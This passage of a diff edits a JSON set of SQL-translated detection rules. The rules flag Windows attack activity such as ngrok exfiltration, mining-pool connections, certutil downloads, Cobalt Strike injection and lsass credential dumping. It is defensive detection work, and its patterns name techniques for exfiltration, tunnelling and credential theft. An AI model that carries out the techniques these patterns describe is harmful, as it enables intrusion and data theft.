'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR 
NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 
'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All 
Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE 
'%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - 
"attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE 
'%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows 
Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND 
((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND 
(TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE 
'\\'))))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, 